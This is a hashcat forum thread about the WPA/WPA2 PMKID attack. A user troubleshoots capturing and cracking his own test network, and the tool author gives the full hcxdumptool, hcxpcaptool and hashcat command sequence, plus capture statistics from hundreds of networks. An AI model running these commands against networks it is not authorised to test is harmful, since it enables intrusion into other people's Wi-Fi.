hashcat Forum
New attack on WPA/WPA2 using PMKID - Printable Version

+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: New attack on WPA/WPA2 using PMKID (/thread-7717.html)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-17-2018

(11-17-2018, 09:44 AM)ZerBea Wrote: Latest link is expired, so I can't download the file.
hcxdumptool attack and dump modes depend on filter list and filter mode option. Running without this options, hcxdumptool will attack all and capture all!.
If you want to attack a single access point (and you do not want to receive other traffic), add this mac to your filter list. Then use --filterlist=<your filterlist> and filtermode=3
Usage is explained in changelog and -h (menu).

BTW:
I found another issue in big endian conversation in pcapng option fields and fixed it with latest hcxtools commit (I hope so...). Big - little endian conversation is really ugly stuff, because I have no big endian machine here. So your pcapng files are really, really appreciated!

New link: http://www.mediafire.com/?4pb257iclbpxxi2wclw8o4j1urjwr7p
Thanks for the filter advice was having issues running filters but on v5 Ill run that maby I had the wrong command
Target Wifi is "shit wifi" with the password of 123456789, hopefully we got the handshake on this run


RE: New attack on WPA/WPA2 using PMKID - ZerBea - 11-17-2018

v4.pcapng looking good:

$ hcxpcaptool -o test.hccapx -z test.16800 v4.pcapng
reading from v4.pcapng
summary:                                        
file name....................: v4.pcapng
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 151
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 142
beacons (with ESSID inside)..: 3
probe requests...............: 4
probe responses..............: 8
association requests.........: 3
association responses........: 5
authentications (OPEN SYSTEM): 89
authentications (BROADCOM)...: 5
EAPOL packets................: 39
EAPOL PMKIDs.................: 5
best handshakes..............: 1 (ap-less: 1)

1 handshake(s) written to test.hccapx
5 PMKID(s) written to test.16800

inside of test.16800 is a PMKID from this network ESSID "shit wifi" and the PSK is not 123456789!

$ whoismac -p 07b4xxxx....xxxx*e84e06xxxxxx*f0a225c4c261*736869742077696669
ESSID..: shit wifi
MAC_AP.: e84e06xxxxxx
VENDOR.: EDUP INTERNATIONAL (HK) CO., LTD
MAC_STA: f0a225c4c261
VENDOR.: Private

From the -E option of hcxpcaptool I noticed that there is also an ESSID "Shit Wifi". Unfortunately we have no handshake and no PMKID from this network.


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-17-2018

(11-17-2018, 11:22 AM)ZerBea Wrote: v4.pcapng looking good:

$ hcxpcaptool -o test.hccapx -z test.16800 v4.pcapng
reading from v4.pcapng
summary:                                        
file name....................: v4.pcapng
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 151
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 142
beacons (with ESSID inside)..: 3
probe requests...............: 4
probe responses..............: 8
association requests.........: 3
association responses........: 5
authentications (OPEN SYSTEM): 89
authentications (BROADCOM)...: 5
EAPOL packets................: 39
EAPOL PMKIDs.................: 5
best handshakes..............: 1 (ap-less: 1)

1 handshake(s) written to test.hccapx
5 PMKID(s) written to test.16800

inside of test.16800 is a PMKID from this network ESSID "shit wifi" and the PSK is not 123456789!

$ whoismac -p 07b4xxxx....xxxx*e84e06xxxxxx*f0a225c4c261*736869742077696669
ESSID..: shit wifi
MAC_AP.: e84e06xxxxxx
VENDOR.: EDUP INTERNATIONAL (HK) CO., LTD
MAC_STA: f0a225c4c261
VENDOR.: Private

From the -E option of hcxpcaptool I noticed that there is also an ESSID "Shit Wifi". Unfortunately we have no handshake and no PMKID from this network.

Strange, well I created multiple networks with the same password as I was having issues grabbing the handshake.
When I run the conversion I get this summary:

Code:
summary:
--------
file name....................: v4.pcapng
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: yes
packets inside...............: 151
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 141
beacons (with ESSID inside)..: 3
probe requests...............: 4
probe responses..............: 8
association requests.........: 3
association responses........: 5
authentications (OPEN SYSTEM): 88
authentications (BROADCOM)...: 5
EAPOL packets................: 39
EAPOL PMKIDs.................: 5
best handshakes..............: 1 (ap-less: 0)

5 PMKID(s) written to v4.16800

I double checked and the password should be 

123456789 however I could reset all the wifi and passwords to try a redump, but Im thinking the issue is much bigger then having a incorrect password, of course Im probably wrong haha


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-18-2018

UPDATE:

Alright, so I installed ubuntu desktop with hcxpcaptool and performed the file conversion, this time I get "flawless" I then compared the hashes from my pineapple and it seems they are exactly the same. So the read errors yes seams to be a text glitch or something. However trying to use hashcat once again I still can't crack it with the password of 123456789, something must be going on when creating the dump file, have a look at this new dump if you want I also installed a new router and triple checked that the password was indeed 123456789.

v5 here http://www.mediafire.com/?ufraznsltbc6x6azvzza5jnip66ki8u

I'm guessing at this point its specifically a pineapple/driver problem, I restored the pineapple and formatted the sd I even tried older builds with no luck at all.

Also this here is the hash

ac20d69c3f1cf3c11309fc9f306cd9e7*e84e063b1484*fcc233ee3edd*736869742077696669
 It SHOULD be 123465789 however it seems uncrackable


RE: New attack on WPA/WPA2 using PMKID - ZerBea - 11-18-2018

I don't think it's a driver issue and I don't think it's a pineapple issue, because use received a PMKID from the access point!

1) check your environment
identify your access point (ESSID and mac)
set the PSK from the access point to 123456789
connect a client to the access point (we need this to verify that the handshakes matches to the PMKID) and use this PSK
use a fix channel (for example: 3)

2) make sure you're using latest git of hcxtools and hcxdumptool
add the mac ap to the filter list
run hcxdumptool:
hcxdumptool -i <your interface> -o test.pcapng --filterlist=your filterlist> --filtermode=3 -t 120 -c 3 --enable-status=1
now wait until you have received a PMKID and a handshake

3) run hcxpcaptool to convert the hashes for hashcat
hcxpcaptool -o test.hccapx -z test.16800 test.pcapng

4) check if test.16800 contains the mac of the access point
and that the mac matches to the mac within test.hccapx
wlanhcxinfo -i test.hccapx -a -e

6) add some words and the PSK 123456789 to the wordlist
first run hashcat on the handshake
hashcat -m 2500 test.hccapx wordlist
hashcat should recover the PSK
now run hashcat on the PMKID
hashcat -m 16800 test.16800 wordlist
hashcat should recover the PSK

7) upload test.pcapng to https://wpa-sec.stanev.org/?
to see if it's crackable by common worlists
use the webinterface or wlancap2wpasec
wlancap2wpasec test.pcapng
if the PSK is easy, wpa-sec should be able to retrieve the the PSK:
Last 24h processed nets: 73876
Last 24h performance: 705.79K/s
Last 24h submissions: 24877
Last 24h founds: 11368
...as of today from wpa-sec stats: https://wpa-sec.stanev.org/?stats


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-18-2018

(11-18-2018, 08:26 PM)ZerBea Wrote: I don't think it's a driver issue and I don't think it's a pineapple issue, because use received a PMKID from the access point!

1) check your environment
identify your access point (ESSID and mac)
set the PSK from the access point to 123456789
connect a client to the access point (we need this to verify that the handshakes matches to the PMKID) and use this PSK
use a fix channel (for example: 3)

2) make sure you're using latest git of hcxtools and hcxdumptool
add the mac ap to the filter list
run hcxdumptool:
hcxdumptool -i <your interface> -o test.pcapng --filterlist=your filterlist> --filtermode=3 -t 120 -c 3 --enable-status=1
now wait until you have received a PMKID and a handshake

3) run hcxpcaptool to convert the hashes for hashcat
hcxpcaptool -o test.hccapx -z test.16800 test.pcapng

4) check if test.16800 contains the mac of the access point
and that the mac matches to the mac within test.hccapx
wlanhcxinfo -i test.hccapx -a -e

6) add some words and the PSK 123456789 to the wordlist
first run hashcat on the handshake
hashcat -m 2500 test.hccapx wordlist
hashcat should recover the PSK
now run hashcat on the PMKID
hashcat -m 16800 test.16800 wordlist
hashcat should recover the PSK

7) upload test.pcapng to https://wpa-sec.stanev.org/?
to see if it's crackable by common worlists
use the webinterface or wlancap2wpasec
wlancap2wpasec test.pcapng
if the PSK is easy, wpa-sec should be able to retrieve the the PSK:
Last 24h processed nets: 73876
Last 24h performance: 705.79K/s
Last 24h submissions: 24877
Last 24h founds: 11368
...as of today from wpa-sec stats: https://wpa-sec.stanev.org/?stats
I downgraded my pineapple and restored everything, I think I actually got it to crack the hash! Ugh that was headache inducing haha, thanks for all your help! Most likely will have more errors/questions when working with this awesome project but for now I think I got it figiured out


RE: New attack on WPA/WPA2 using PMKID - ZerBea - 11-27-2018

Due to several big endian fixes, hcxdumptool and hcxtools moved to v 5.0.1.
I received a notice that they are running on OpenWRT.
But keep in mind:
Both, PMKID attack vector and AP-LESS attack vector, are highly effective and ultra fast, if you follow the recommendation:
Raspberry PI or Notebook
Arch Linux
Supported WiFi adapter (for example: rt2800usb driver):

$ hcxpcaptool -V example.pcapng
reading from example.pcapng
summary:
file name....................: example.pcapng
file type....................: pcapng 1.0
file hardware information....: armv6l
file os information..........: Linux 4.14.83-2-ARCH
file application information.: hcxdumptool 5.0.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 22336
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 53
beacons (with ESSID inside)..: 4006
probe requests...............: 758
probe responses..............: 1581
association requests.........: 376
association responses........: 635
reassociation requests.......: 91
reassociation responses......: 167
authentications (OPEN SYSTEM): 7956
authentications (BROADCOM)...: 7919
authentications (SONOS)......: 23
authentications (APPLE)......: 7
authentications (NETGEAR)....: 1
EAPOL packets................: 6399
EAPOL PMKIDs.................: 754
EAP packets..................: 126
found........................: EAP type ID
best handshakes..............: 252 (ap-less: 124)


754 PMKIDs (different CLIENTs)!
128 handshakes from AP-CLIENT (different CLIENTs)!
124 handshakes AP-LESS (different CLIENTs)!


RE: New attack on WPA/WPA2 using PMKID - Calyptorhynchus - 01-10-2019

<3<3<3<3<3<3<3<3<3<3<3!!!!!